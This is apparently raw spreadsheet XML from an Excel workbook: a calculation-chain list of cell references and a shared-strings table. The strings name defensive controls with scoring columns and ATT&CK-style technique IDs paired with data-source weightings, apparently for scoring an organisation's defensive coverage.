  <c r="I205" i="9"/>
  <c r="B205" i="9"/>
  <c r="K204" i="9"/>
  <c r="I204" i="9"/>
  <c r="B204" i="9"/>
  <c r="K203" i="9"/>
  <c r="I203" i="9"/>
  <c r="B203" i="9"/>
  <c r="K202" i="9"/>
  <c r="I202" i="9"/>
  <c r="B202" i="9"/>
  <c r="K201" i="9"/>
  <c r="I201" i="9"/>
  <c r="B201" i="9"/>
  <c r="K200" i="9"/>
  <c r="I200" i="9"/>
  <c r="B200" i="9"/>
  <c r="K199" i="9"/>
  <c r="I199" i="9"/>
  <c r="B199" i="9"/>
  <c r="K198" i="9"/>
  <c r="I198" i="9"/>
  <c r="B198" i="9"/>
  <c r="K197" i="9"/>
  <c r="I197" i="9"/>
  <c r="B197" i="9"/>
  <c r="K196" i="9"/>
  <c r="I196" i="9"/>
  <c r="B196" i="9"/>
  <c r="K195" i="9"/>
  <c r="I195" i="9"/>
  <c r="B195" i="9"/>
  <c r="K194" i="9"/>
  <c r="I194" i="9"/>
  <c r="B194" i="9"/>
  <c r="K193" i="9"/>
  <c r="I193" i="9"/>
  <c r="B193" i="9"/>
  <c r="K192" i="9"/>
  <c r="I192" i="9"/>
  <c r="B192" i="9"/>
  <c r="K191" i="9"/>
  <c r="I191" i="9"/>
  <c r="B191" i="9"/>
  <c r="K190" i="9"/>
  <c r="I190" i="9"/>
  <c r="B190" i="9"/>
  <c r="K189" i="9"/>
  <c r="I189" i="9"/>
  <c r="B189" i="9"/>
  <c r="K188" i="9"/>
  <c r="I188" i="9"/>
  <c r="B188" i="9"/>
  <c r="K187" i="9"/>
  <c r="I187" i="9"/>
  <c r="B187" i="9"/>
  <c r="K186" i="9"/>
  <c r="I186" i="9"/>
  <c r="B186" i="9"/>
  <c r="K185" i="9"/>
  <c r="I185" i="9"/>
  <c r="B185" i="9"/>
  <c r="K184" i="9"/>
  <c r="I184" i="9"/>
  <c r="B184" i="9"/>
  <c r="K183" i="9"/>
  <c r="I183" i="9"/>
  <c r="B183" i="9"/>
  <c r="K182" i="9"/>
  <c r="I182" i="9"/>
  <c r="B182" i="9"/>
  <c r="K181" i="9"/>
  <c r="I181" i="9"/>
  <c r="B181" i="9"/>
  <c r="K180" i="9"/>
  <c r="I180" i="9"/>
  <c r="B180" i="9"/>
  <c r="K179" i="9"/>
  <c r="I179" i="9"/>
  <c r="B179" i="9"/>
  <c r="K178" i="9"/>
  <c r="I178" i="9"/>
  <c r="B178" i="9"/>
  <c r="K177" i="9"/>
  <c r="I177" i="9"/>
  <c r="B177" i="9"/>
  <c r="K176" i="9"/>
  <c r="I176" i="9"/>
  <c r="B176" i="9"/>
  <c r="K175" i="9"/>
  <c r="I175" i="9"/>
  <c r="B175" i="9"/>
  <c r="K174" i="9"/>
  <c r="I174" i="9"/>
  <c r="B174" i="9"/>
  <c r="K173" i="9"/>
  <c r="I173" i="9"/>
  <c r="B173" i="9"/>
  <c r="K172" i="9"/>
  <c r="I172" i="9"/>
  <c r="B172" i="9"/>
  <c r="K171" i="9"/>
  <c r="I171" i="9"/>
  <c r="B171" i="9"/>
  <c r="K170" i="9"/>
  <c r="I170" i="9"/>
  <c r="B170" i="9"/>
  <c r="K169" i="9"/>
  <c r="I169" i="9"/>
  <c r="B169" i="9"/>
  <c r="K168" i="9"/>
  <c r="I168" i="9"/>
  <c r="B168" i="9"/>
  <c r="K167" i="9"/>
  <c r="I167" i="9"/>
  <c r="B167" i="9"/>
  <c r="K166" i="9"/>
  <c r="I166" i="9"/>
  <c r="B166" i="9"/>
  <c r="K165" i="9"/>
  <c r="I165" i="9"/>
  <c r="B165" i="9"/>
  <c r="K164" i="9"/>
  <c r="I164" i="9"/>
  <c r="B164" i="9"/>
  <c r="K163" i="9"/>
  <c r="I163" i="9"/>
  <c r="B163" i="9"/>
  <c r="K162" i="9"/>
  <c r="I162" i="9"/>
  <c r="B162" i="9"/>
  <c r="K161" i="9"/>
  <c r="I161" i="9"/>
  <c r="B161" i="9"/>
  <c r="K160" i="9"/>
  <c r="I160" i="9"/>
  <c r="B160" i="9"/>
  <c r="K159" i="9"/>
  <c r="I159" i="9"/>
  <c r="B159" i="9"/>
  <c r="K158" i="9"/>
  <c r="I158" i="9"/>
  <c r="B158" i="9"/>
  <c r="K157" i="9"/>
  <c r="I157" i="9"/>
  <c r="B157" i="9"/>
  <c r="K156" i="9"/>
  <c r="I156" i="9"/>
  <c r="B156" i="9"/>
  <c r="K155" i="9"/>
  <c r="I155" i="9"/>
  <c r="B155" i="9"/>
  <c r="K154" i="9"/>
  <c r="I154" i="9"/>
  <c r="B154" i="9"/>
  <c r="K153" i="9"/>
  <c r="I153" i="9"/>
  <c r="B153" i="9"/>
  <c r="K152" i="9"/>
  <c r="I152" i="9"/>
  <c r="B152" i="9"/>
  <c r="K151" i="9"/>
  <c r="I151" i="9"/>
  <c r="B151" i="9"/>
  <c r="K150" i="9"/>
  <c r="I150" i="9"/>
  <c r="B150" i="9"/>
  <c r="K149" i="9"/>
  <c r="I149" i="9"/>
  <c r="B149" i="9"/>
  <c r="K148" i="9"/>
  <c r="I148" i="9"/>
  <c r="B148" i="9"/>
  <c r="K147" i="9"/>
  <c r="I147" i="9"/>
  <c r="B147" i="9"/>
  <c r="K146" i="9"/>
  <c r="I146" i="9"/>
  <c r="B146" i="9"/>
  <c r="K145" i="9"/>
  <c r="I145" i="9"/>
  <c r="B145" i="9"/>
  <c r="K144" i="9"/>
  <c r="I144" i="9"/>
  <c r="B144" i="9"/>
  <c r="K143" i="9"/>
  <c r="I143" i="9"/>
  <c r="B143" i="9"/>
  <c r="K142" i="9"/>
  <c r="I142" i="9"/>
  <c r="B142" i="9"/>
  <c r="K141" i="9"/>
  <c r="I141" i="9"/>
  <c r="B141" i="9"/>
  <c r="K140" i="9"/>
  <c r="I140" i="9"/>
  <c r="B140" i="9"/>
  <c r="K139" i="9"/>
  <c r="I139" i="9"/>
  <c r="B139" i="9"/>
  <c r="K138" i="9"/>
  <c r="I138" i="9"/>
  <c r="B138" i="9"/>
  <c r="K137" i="9"/>
  <c r="I137" i="9"/>
  <c r="B137" i="9"/>
  <c r="K136" i="9"/>
  <c r="I136" i="9"/>
  <c r="B136" i="9"/>
  <c r="K135" i="9"/>
  <c r="I135" i="9"/>
  <c r="B135" i="9"/>
  <c r="K134" i="9"/>
  <c r="I134" i="9"/>
  <c r="B134" i="9"/>
  <c r="K133" i="9"/>
  <c r="I133" i="9"/>
  <c r="B133" i="9"/>
  <c r="K132" i="9"/>
  <c r="I132" i="9"/>
  <c r="B132" i="9"/>
  <c r="K131" i="9"/>
  <c r="I131" i="9"/>
  <c r="B131" i="9"/>
  <c r="K130" i="9"/>
  <c r="I130" i="9"/>
  <c r="B130" i="9"/>
  <c r="K129" i="9"/>
  <c r="I129" i="9"/>
  <c r="B129" i="9"/>
  <c r="K128" i="9"/>
  <c r="I128" i="9"/>
  <c r="B128" i="9"/>
  <c r="K127" i="9"/>
  <c r="I127" i="9"/>
  <c r="B127" i="9"/>
  <c r="K126" i="9"/>
  <c r="I126" i="9"/>
  <c r="B126" i="9"/>
  <c r="K125" i="9"/>
  <c r="I125" i="9"/>
  <c r="B125" i="9"/>
  <c r="K124" i="9"/>
  <c r="I124" i="9"/>
  <c r="B124" i="9"/>
  <c r="K123" i="9"/>
  <c r="I123" i="9"/>
  <c r="B123" i="9"/>
  <c r="K122" i="9"/>
  <c r="I122" i="9"/>
  <c r="B122" i="9"/>
  <c r="K121" i="9"/>
  <c r="I121" i="9"/>
  <c r="B121" i="9"/>
  <c r="K120" i="9"/>
  <c r="I120" i="9"/>
  <c r="B120" i="9"/>
  <c r="K119" i="9"/>
  <c r="I119" i="9"/>
  <c r="B119" i="9"/>
  <c r="K118" i="9"/>
  <c r="I118" i="9"/>
  <c r="B118" i="9"/>
  <c r="K117" i="9"/>
  <c r="I117" i="9"/>
  <c r="B117" i="9"/>
  <c r="K116" i="9"/>
  <c r="I116" i="9"/>
  <c r="B116" i="9"/>
  <c r="K115" i="9"/>
  <c r="I115" i="9"/>
  <c r="B115" i="9"/>
  <c r="K114" i="9"/>
  <c r="I114" i="9"/>
  <c r="B114" i="9"/>
  <c r="K113" i="9"/>
  <c r="I113" i="9"/>
  <c r="B113" i="9"/>
  <c r="K112" i="9"/>
  <c r="I112" i="9"/>
  <c r="B112" i="9"/>
  <c r="K111" i="9"/>
  <c r="I111" i="9"/>
  <c r="B111" i="9"/>
  <c r="K110" i="9"/>
  <c r="I110" i="9"/>
  <c r="B110" i="9"/>
  <c r="K109" i="9"/>
  <c r="I109" i="9"/>
  <c r="B109" i="9"/>
  <c r="K108" i="9"/>
  <c r="I108" i="9"/>
  <c r="B108" i="9"/>
  <c r="K107" i="9"/>
  <c r="I107" i="9"/>
  <c r="B107" i="9"/>
  <c r="K106" i="9"/>
  <c r="I106" i="9"/>
  <c r="B106" i="9"/>
  <c r="K105" i="9"/>
  <c r="I105" i="9"/>
  <c r="B105" i="9"/>
  <c r="K104" i="9"/>
  <c r="I104" i="9"/>
  <c r="B104" i="9"/>
  <c r="K103" i="9"/>
  <c r="I103" i="9"/>
  <c r="B103" i="9"/>
  <c r="K102" i="9"/>
  <c r="I102" i="9"/>
  <c r="B102" i="9"/>
  <c r="K101" i="9"/>
  <c r="I101" i="9"/>
  <c r="B101" i="9"/>
  <c r="K100" i="9"/>
  <c r="I100" i="9"/>
  <c r="B100" i="9"/>
  <c r="K99" i="9"/>
  <c r="I99" i="9"/>
  <c r="B99" i="9"/>
  <c r="K98" i="9"/>
  <c r="I98" i="9"/>
  <c r="B98" i="9"/>
  <c r="K97" i="9"/>
  <c r="I97" i="9"/>
  <c r="B97" i="9"/>
  <c r="K96" i="9"/>
  <c r="I96" i="9"/>
  <c r="B96" i="9"/>
  <c r="K95" i="9"/>
  <c r="I95" i="9"/>
  <c r="B95" i="9"/>
  <c r="K94" i="9"/>
  <c r="I94" i="9"/>
  <c r="B94" i="9"/>
  <c r="K93" i="9"/>
  <c r="I93" i="9"/>
  <c r="B93" i="9"/>
  <c r="K92" i="9"/>
  <c r="I92" i="9"/>
  <c r="B92" i="9"/>
  <c r="K91" i="9"/>
  <c r="I91" i="9"/>
  <c r="B91" i="9"/>
  <c r="K90" i="9"/>
  <c r="I90" i="9"/>
  <c r="B90" i="9"/>
  <c r="K89" i="9"/>
  <c r="I89" i="9"/>
  <c r="B89" i="9"/>
  <c r="K88" i="9"/>
  <c r="I88" i="9"/>
  <c r="B88" i="9"/>
  <c r="K87" i="9"/>
  <c r="I87" i="9"/>
  <c r="B87" i="9"/>
  <c r="K86" i="9"/>
  <c r="I86" i="9"/>
  <c r="B86" i="9"/>
  <c r="K85" i="9"/>
  <c r="I85" i="9"/>
  <c r="B85" i="9"/>
  <c r="K84" i="9"/>
  <c r="I84" i="9"/>
  <c r="B84" i="9"/>
  <c r="K83" i="9"/>
  <c r="I83" i="9"/>
  <c r="B83" i="9"/>
  <c r="K82" i="9"/>
  <c r="I82" i="9"/>
  <c r="B82" i="9"/>
  <c r="K81" i="9"/>
  <c r="I81" i="9"/>
  <c r="B81" i="9"/>
  <c r="K80" i="9"/>
  <c r="I80" i="9"/>
  <c r="B80" i="9"/>
  <c r="K79" i="9"/>
  <c r="I79" i="9"/>
  <c r="B79" i="9"/>
  <c r="K78" i="9"/>
  <c r="I78" i="9"/>
  <c r="B78" i="9"/>
  <c r="K77" i="9"/>
  <c r="I77" i="9"/>
  <c r="B77" i="9"/>
  <c r="K76" i="9"/>
  <c r="I76" i="9"/>
  <c r="B76" i="9"/>
  <c r="K75" i="9"/>
  <c r="I75" i="9"/>
  <c r="B75" i="9"/>
  <c r="K74" i="9"/>
  <c r="I74" i="9"/>
  <c r="B74" i="9"/>
  <c r="K73" i="9"/>
  <c r="I73" i="9"/>
  <c r="B73" i="9"/>
  <c r="K72" i="9"/>
  <c r="I72" i="9"/>
  <c r="B72" i="9"/>
  <c r="K71" i="9"/>
  <c r="I71" i="9"/>
  <c r="B71" i="9"/>
  <c r="K70" i="9"/>
  <c r="I70" i="9"/>
  <c r="B70" i="9"/>
  <c r="K69" i="9"/>
  <c r="I69" i="9"/>
  <c r="B69" i="9"/>
  <c r="K68" i="9"/>
  <c r="I68" i="9"/>
  <c r="B68" i="9"/>
  <c r="K67" i="9"/>
  <c r="I67" i="9"/>
  <c r="B67" i="9"/>
  <c r="K66" i="9"/>
  <c r="I66" i="9"/>
  <c r="B66" i="9"/>
  <c r="K65" i="9"/>
  <c r="I65" i="9"/>
  <c r="B65" i="9"/>
  <c r="K64" i="9"/>
  <c r="I64" i="9"/>
  <c r="B64" i="9"/>
  <c r="K63" i="9"/>
  <c r="I63" i="9"/>
  <c r="B63" i="9"/>
  <c r="K62" i="9"/>
  <c r="I62" i="9"/>
  <c r="B62" i="9"/>
  <c r="K61" i="9"/>
  <c r="I61" i="9"/>
  <c r="B61" i="9"/>
  <c r="K60" i="9"/>
  <c r="I60" i="9"/>
  <c r="B60" i="9"/>
  <c r="K59" i="9"/>
  <c r="I59" i="9"/>
  <c r="B59" i="9"/>
  <c r="K58" i="9"/>
  <c r="I58" i="9"/>
  <c r="B58" i="9"/>
  <c r="K57" i="9"/>
  <c r="I57" i="9"/>
  <c r="B57" i="9"/>
  <c r="K56" i="9"/>
  <c r="I56" i="9"/>
  <c r="B56" i="9"/>
  <c r="K55" i="9"/>
  <c r="I55" i="9"/>
  <c r="B55" i="9"/>
  <c r="K54" i="9"/>
  <c r="I54" i="9"/>
  <c r="B54" i="9"/>
  <c r="K53" i="9"/>
  <c r="I53" i="9"/>
  <c r="B53" i="9"/>
  <c r="K52" i="9"/>
  <c r="I52" i="9"/>
  <c r="B52" i="9"/>
  <c r="K51" i="9"/>
  <c r="I51" i="9"/>
  <c r="B51" i="9"/>
  <c r="K50" i="9"/>
  <c r="I50" i="9"/>
  <c r="B50" i="9"/>
  <c r="K49" i="9"/>
  <c r="I49" i="9"/>
  <c r="B49" i="9"/>
  <c r="K48" i="9"/>
  <c r="I48" i="9"/>
  <c r="B48" i="9"/>
  <c r="K47" i="9"/>
  <c r="I47" i="9"/>
  <c r="B47" i="9"/>
  <c r="K46" i="9"/>
  <c r="I46" i="9"/>
  <c r="B46" i="9"/>
  <c r="K45" i="9"/>
  <c r="I45" i="9"/>
  <c r="B45" i="9"/>
  <c r="K44" i="9"/>
  <c r="I44" i="9"/>
  <c r="B44" i="9"/>
  <c r="K43" i="9"/>
  <c r="I43" i="9"/>
  <c r="B43" i="9"/>
  <c r="K42" i="9"/>
  <c r="I42" i="9"/>
  <c r="B42" i="9"/>
  <c r="K41" i="9"/>
  <c r="I41" i="9"/>
  <c r="B41" i="9"/>
  <c r="K40" i="9"/>
  <c r="I40" i="9"/>
  <c r="B40" i="9"/>
  <c r="K39" i="9"/>
  <c r="I39" i="9"/>
  <c r="B39" i="9"/>
  <c r="K38" i="9"/>
  <c r="I38" i="9"/>
  <c r="B38" i="9"/>
  <c r="K37" i="9"/>
  <c r="I37" i="9"/>
  <c r="B37" i="9"/>
  <c r="K36" i="9"/>
  <c r="I36" i="9"/>
  <c r="B36" i="9"/>
  <c r="K35" i="9"/>
  <c r="I35" i="9"/>
  <c r="B35" i="9"/>
  <c r="K34" i="9"/>
  <c r="I34" i="9"/>
  <c r="B34" i="9"/>
  <c r="K33" i="9"/>
  <c r="I33" i="9"/>
  <c r="B33" i="9"/>
  <c r="K32" i="9"/>
  <c r="I32" i="9"/>
  <c r="B32" i="9"/>
  <c r="K31" i="9"/>
  <c r="I31" i="9"/>
  <c r="B31" i="9"/>
  <c r="K30" i="9"/>
  <c r="I30" i="9"/>
  <c r="B30" i="9"/>
  <c r="K29" i="9"/>
  <c r="I29" i="9"/>
  <c r="B29" i="9"/>
  <c r="K28" i="9"/>
  <c r="I28" i="9"/>
  <c r="B28" i="9"/>
  <c r="K27" i="9"/>
  <c r="I27" i="9"/>
  <c r="B27" i="9"/>
  <c r="K26" i="9"/>
  <c r="I26" i="9"/>
  <c r="B26" i="9"/>
  <c r="K25" i="9"/>
  <c r="I25" i="9"/>
  <c r="B25" i="9"/>
  <c r="K24" i="9"/>
  <c r="I24" i="9"/>
  <c r="B24" i="9"/>
  <c r="K23" i="9"/>
  <c r="I23" i="9"/>
  <c r="B23" i="9"/>
  <c r="K22" i="9"/>
  <c r="I22" i="9"/>
  <c r="B22" i="9"/>
  <c r="K21" i="9"/>
  <c r="I21" i="9"/>
  <c r="B21" i="9"/>
  <c r="K20" i="9"/>
  <c r="I20" i="9"/>
  <c r="B20" i="9"/>
  <c r="K19" i="9"/>
  <c r="I19" i="9"/>
  <c r="B19" i="9"/>
  <c r="K18" i="9"/>
  <c r="I18" i="9"/>
  <c r="B18" i="9"/>
  <c r="K17" i="9"/>
  <c r="I17" i="9"/>
  <c r="B17" i="9"/>
  <c r="K16" i="9"/>
  <c r="I16" i="9"/>
  <c r="B16" i="9"/>
  <c r="K15" i="9"/>
  <c r="I15" i="9"/>
  <c r="B15" i="9"/>
  <c r="K14" i="9"/>
  <c r="I14" i="9"/>
  <c r="B14" i="9"/>
  <c r="K13" i="9"/>
  <c r="I13" i="9"/>
  <c r="B13" i="9"/>
  <c r="K12" i="9"/>
  <c r="I12" i="9"/>
  <c r="B12" i="9"/>
  <c r="K11" i="9"/>
  <c r="I11" i="9"/>
  <c r="B11" i="9"/>
  <c r="K10" i="9"/>
  <c r="I10" i="9"/>
  <c r="B10" i="9"/>
  <c r="K9" i="9"/>
  <c r="I9" i="9"/>
  <c r="B9" i="9"/>
  <c r="K8" i="9"/>
  <c r="I8" i="9"/>
  <c r="B8" i="9"/>
  <c r="K7" i="9"/>
  <c r="I7" i="9"/>
  <c r="B7" i="9"/>
  <c r="K6" i="9"/>
  <c r="I6" i="9"/>
  <c r="B6" i="9"/>
  <c r="K5" i="9"/>
  <c r="I5" i="9"/>
  <c r="B5" i="9"/>
  <c r="K4" i="9"/>
  <c r="I4" i="9"/>
  <c r="B4" i="9"/>
  <c r="K3" i="9"/>
  <c r="I3" i="9"/>
  <c r="B3" i="9"/>
  <c r="K2" i="9"/>
  <c r="I2" i="9"/>
  <c r="B2" i="9"/>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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="7709" uniqueCount="3099">
  <si>
    <t>Defense</t>
  </si>
  <si>
    <t>Rationale</t>
  </si>
  <si>
    <t>Coverage</t>
  </si>
  <si>
    <t>Maintainability</t>
  </si>
  <si>
    <t>Confidence</t>
  </si>
  <si>
    <t>Score</t>
  </si>
  <si>
    <t>Anti-virus</t>
  </si>
  <si>
    <t>AV on email, host and proxy</t>
  </si>
  <si>
    <t>Application whitelisting</t>
  </si>
  <si>
    <t>Limited application</t>
  </si>
  <si>
    <t>Autoruns Analysis</t>
  </si>
  <si>
    <t>Binary Analysis</t>
  </si>
  <si>
    <t>Part of the EDR solution</t>
  </si>
  <si>
    <t>Data Execution Prevention</t>
  </si>
  <si>
    <t>Digital Certificate Validation</t>
  </si>
  <si>
    <t>Exploit Prevention</t>
  </si>
  <si>
    <t>File monitoring</t>
  </si>
  <si>
    <t>File system access controls</t>
  </si>
  <si>
    <t>Limited implementation</t>
  </si>
  <si>
    <t>Firewall</t>
  </si>
  <si>
    <t>Micro segmentation routed through firewalls, No host based firewalling</t>
  </si>
  <si>
    <t>Heuristic detection</t>
  </si>
  <si>
    <t>Host forensic analysis</t>
  </si>
  <si>
    <t>Host intrusion prevention systems</t>
  </si>
  <si>
    <t>Log analysis</t>
  </si>
  <si>
    <t>Implemented SIEM and operational threat hunters</t>
  </si>
  <si>
    <t>Login Credentials</t>
  </si>
  <si>
    <t>Logging from AD and local machines</t>
  </si>
  <si>
    <t>Multi-Factor Authentication</t>
  </si>
  <si>
    <t>Network intrusion prevention systems</t>
  </si>
  <si>
    <t>Process Whitelisting</t>
  </si>
  <si>
    <t>No implemented</t>
  </si>
  <si>
    <t>Signature-based detection</t>
  </si>
  <si>
    <t>System access controls</t>
  </si>
  <si>
    <t>User Mode Signature Validation</t>
  </si>
  <si>
    <t>Only allow signed macros and plugins</t>
  </si>
  <si>
    <t>Whitelisting by file name or path</t>
  </si>
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>Data Source</t>
  </si>
  <si>
    <t>Weight</t>
  </si>
  <si>
    <t>Datasources</t>
  </si>
  <si>
    <t>Weights</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t>Items in Refence vs Items in this sheet</t>
  </si>
  <si>
    <t>T1001</t>
  </si>
  <si>
    <t>25;25;25;25</t>
  </si>
  <si>
    <t>T1002</t>
  </si>
  <si>
    <t>20;20;30;30</t>
  </si>
  <si>
    <t>T1003</t>
  </si>
  <si>
    <t>T1004</t>
  </si>
  <si>
    <t>50;20;30</t>
  </si>
  <si>
    <t>T1005</t>
  </si>
  <si>
    <t>35;30;35</t>
  </si>
  <si>
    <t>T1006</t>
  </si>
  <si>
    <t>T1007</t>
  </si>
  <si>
    <t>40;60</t>
  </si>
  <si>
    <t>T1008</t>
  </si>
  <si>
    <t>15;23;22;15;25</t>
  </si>
  <si>
    <t>T1009</t>
  </si>
  <si>
    <t>33;34;33</t>
  </si>
  <si>
    <t>T1010</t>
  </si>
  <si>
    <t>35;25;40</t>
  </si>
  <si>
    <t>T1011</t>
  </si>
  <si>
    <t>49;51</t>
  </si>
  <si>
    <t>T1012</t>
  </si>
  <si>
    <t>30;20;50</t>
  </si>
  <si>
    <t>T1013</t>
  </si>
  <si>
    <t>20;20;20;20;20</t>
  </si>
  <si>
    <t>T1014</t>
  </si>
  <si>
    <t>20;40;40</t>
  </si>
  <si>
    <t>T1015</t>
  </si>
  <si>
    <t>40;30;30</t>
  </si>
  <si>
    <t>T1016</t>
  </si>
  <si>
    <t>T1017</t>
  </si>
  <si>
    <t>35;35;30</t>
  </si>
  <si>
    <t>T1018</t>
  </si>
  <si>
    <t>30;20;25;25</t>
  </si>
  <si>
    <t>T1019</t>
  </si>
  <si>
    <t>33;33;34</t>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <t>T1021</t>
  </si>
  <si>
    <t>T1022</t>
  </si>
  <si>
    <t>40;15;25;20</t>
  </si>
  <si>
    <t>T1023</t>
  </si>
  <si>
    <t>T1024</t>
  </si>
  <si>
    <t>T1025</t>
  </si>
  <si>
    <t>T1026</t>
  </si>
  <si>
    <t>T1027</t>
  </si>
  <si>
    <t>8;8;8;8;8;9;10;8;9;8;8;8</t>
  </si>
  <si>
    <t>T1028</t>
  </si>
  <si>
    <t>15;20;20;20;25</t>
  </si>
  <si>
    <t>T1029</t>
  </si>
  <si>
    <t>T1030</t>
  </si>
  <si>
    <t>30;30;20;20</t>
  </si>
  <si>
    <t>T1031</t>
  </si>
  <si>
    <t>30;20;20;30</t>
  </si>
  <si>
    <t>T1032</t>
  </si>
  <si>
    <t>20;15;15;15;15;20</t>
  </si>
  <si>
    <t>T1033</t>
  </si>
  <si>
    <t>25;25;50</t>
  </si>
  <si>
    <t>T1034</t>
  </si>
  <si>
    <t>T1035</t>
  </si>
  <si>
    <t>T1036</t>
  </si>
  <si>
    <t>T1037</t>
  </si>
  <si>
    <t>45;55</t>
  </si>
  <si>
    <t>T1038</t>
  </si>
  <si>
    <t>T1039</t>
  </si>
  <si>
    <t>40;20;40</t>
  </si>
  <si>
    <t>T1040</t>
  </si>
  <si>
    <t>30;30;15;25</t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>30;70</t>
  </si>
  <si>
    <t>T1042</t>
  </si>
  <si>
    <t>T1043</t>
  </si>
  <si>
    <t>30;30;30;10</t>
  </si>
  <si>
    <t>T1044</t>
  </si>
  <si>
    <t>T1045</t>
  </si>
  <si>
    <t>T1046</t>
  </si>
  <si>
    <t>T1047</t>
  </si>
  <si>
    <t>T1048</t>
  </si>
  <si>
    <t>10;15;20;15;20;20</t>
  </si>
  <si>
    <t>T1049</t>
  </si>
  <si>
    <t>35;65</t>
  </si>
  <si>
    <t>T1050</t>
  </si>
  <si>
    <t>T1051</t>
  </si>
  <si>
    <t>T1052</t>
  </si>
  <si>
    <t>60;40</t>
  </si>
  <si>
    <t>T1053</t>
  </si>
  <si>
    <t>10;20;35;35</t>
  </si>
  <si>
    <t>T1054</t>
  </si>
  <si>
    <t>40;35;25</t>
  </si>
  <si>
    <t>T1055</t>
  </si>
  <si>
    <t>16;16;16;17;18;17</t>
  </si>
  <si>
    <t>T1056</t>
  </si>
  <si>
    <t>20;30;30;20</t>
  </si>
  <si>
    <t>T1057</t>
  </si>
  <si>
    <t>T1058</t>
  </si>
  <si>
    <t>30;30;40</t>
  </si>
  <si>
    <t>T1059</t>
  </si>
  <si>
    <t>T1060</t>
  </si>
  <si>
    <t>70;30</t>
  </si>
  <si>
    <t>T1061</t>
  </si>
  <si>
    <t>T1062</t>
  </si>
  <si>
    <t>T1063</t>
  </si>
  <si>
    <t>25;35;40</t>
  </si>
  <si>
    <t>T1064</t>
  </si>
  <si>
    <t>33;30;37</t>
  </si>
  <si>
    <t>T1065</t>
  </si>
  <si>
    <t>T1066</t>
  </si>
  <si>
    <t>T1067</t>
  </si>
  <si>
    <t>45;35;20</t>
  </si>
  <si>
    <t>T1068</t>
  </si>
  <si>
    <t>30;40;30</t>
  </si>
  <si>
    <t>T1069</t>
  </si>
  <si>
    <t>T1070</t>
  </si>
  <si>
    <t>T1071</t>
  </si>
  <si>
    <t>15;30;25;15;15</t>
  </si>
  <si>
    <t>T1072</t>
  </si>
  <si>
    <t>10;15;20;20;15;10</t>
  </si>
  <si>
    <t>T1073</t>
  </si>
  <si>
    <t>T1074</t>
  </si>
  <si>
    <t>T1075</t>
  </si>
  <si>
    <t>T1076</t>
  </si>
  <si>
    <t>T1077</t>
  </si>
  <si>
    <t>25;35;15;25</t>
  </si>
  <si>
    <t>T1078</t>
  </si>
  <si>
    <t>65;35</t>
  </si>
  <si>
    <t>T1079</t>
  </si>
  <si>
    <t>35;35;15;15</t>
  </si>
  <si>
    <t>T1080</t>
  </si>
  <si>
    <t>T1081</t>
  </si>
  <si>
    <t>T1082</t>
  </si>
  <si>
    <t>T1083</t>
  </si>
  <si>
    <t>T1084</t>
  </si>
  <si>
    <t>T1085</t>
  </si>
  <si>
    <t>15;25;40;20</t>
  </si>
  <si>
    <t>T1086</t>
  </si>
  <si>
    <t>20;15;30;35</t>
  </si>
  <si>
    <t>T1087</t>
  </si>
  <si>
    <t>T1088</t>
  </si>
  <si>
    <t>25;20;35;20</t>
  </si>
  <si>
    <t>T1089</t>
  </si>
  <si>
    <t>20;10;20;15;20;15</t>
  </si>
  <si>
    <t>T1090</t>
  </si>
  <si>
    <t>30;20;30;20</t>
  </si>
  <si>
    <t>T1091</t>
  </si>
  <si>
    <t>T1092</t>
  </si>
  <si>
    <t>T1093</t>
  </si>
  <si>
    <t>T1094</t>
  </si>
  <si>
    <t>15;20;20;10;10;15;10</t>
  </si>
  <si>
    <t>T1095</t>
  </si>
  <si>
    <t>15;20;20;15;10;20</t>
  </si>
  <si>
    <t>T1096</t>
  </si>
  <si>
    <t>30;10;30;30</t>
  </si>
  <si>
    <t>T1097</t>
  </si>
  <si>
    <t>T1098</t>
  </si>
  <si>
    <t>T1099</t>
  </si>
  <si>
    <t>40;25;35</t>
  </si>
  <si>
    <t>T1100</t>
  </si>
  <si>
    <t>T1101</t>
  </si>
  <si>
    <t>T1102</t>
  </si>
  <si>
    <t>10;25;20;20;25</t>
  </si>
  <si>
    <t>T1103</t>
  </si>
  <si>
    <t>T1104</t>
  </si>
  <si>
    <t>25;15;20;15;25</t>
  </si>
  <si>
    <t>T1105</t>
  </si>
  <si>
    <t>20;10;20;20;15;15</t>
  </si>
  <si>
    <t>T1106</t>
  </si>
  <si>
    <t>T1107</t>
  </si>
  <si>
    <t>40;40;20</t>
  </si>
  <si>
    <t>T1108</t>
  </si>
  <si>
    <t>10;20;10;10;20;20;10</t>
  </si>
  <si>
    <t>T1109</t>
  </si>
  <si>
    <t>10;30;30;30</t>
  </si>
  <si>
    <t>T1110</t>
  </si>
  <si>
    <t>T1111</t>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <t>30;15;15;30;30</t>
  </si>
  <si>
    <t>T1113</t>
  </si>
  <si>
    <t>45;30;25</t>
  </si>
  <si>
    <t>T1114</t>
  </si>
  <si>
    <t>35;25;15;25</t>
  </si>
  <si>
    <t>T1115</t>
  </si>
  <si>
    <t>T1116</t>
  </si>
  <si>
    <t>T1117</t>
  </si>
  <si>
    <t>T1118</t>
  </si>
  <si>
    <t>T1119</t>
  </si>
  <si>
    <t>T1120</t>
  </si>
  <si>
    <t>T1121</t>
  </si>
  <si>
    <t>T1122</t>
  </si>
  <si>
    <t>30;35;35</t>
  </si>
  <si>
    <t>T1123</t>
  </si>
  <si>
    <t>T1124</t>
  </si>
  <si>
    <t xml:space="preserve">T1125 </t>
  </si>
  <si>
    <t>T1126</t>
  </si>
  <si>
    <t>25;35;20;30</t>
  </si>
  <si>
    <t>T1127</t>
  </si>
  <si>
    <t>T1128</t>
  </si>
  <si>
    <t>T1129</t>
  </si>
  <si>
    <t>25;30;20;25</t>
  </si>
  <si>
    <t>T1130</t>
  </si>
  <si>
    <t>T1131</t>
  </si>
  <si>
    <t>T1132</t>
  </si>
  <si>
    <t>T1133</t>
  </si>
  <si>
    <t>T1134</t>
  </si>
  <si>
    <t>T1135</t>
  </si>
  <si>
    <t>T1136</t>
  </si>
  <si>
    <t>15;25;30;30</t>
  </si>
  <si>
    <t>T1137</t>
  </si>
  <si>
    <t>T1138</t>
  </si>
  <si>
    <t>T1139</t>
  </si>
  <si>
    <t>T1140</t>
  </si>
  <si>
    <t>20;30;50</t>
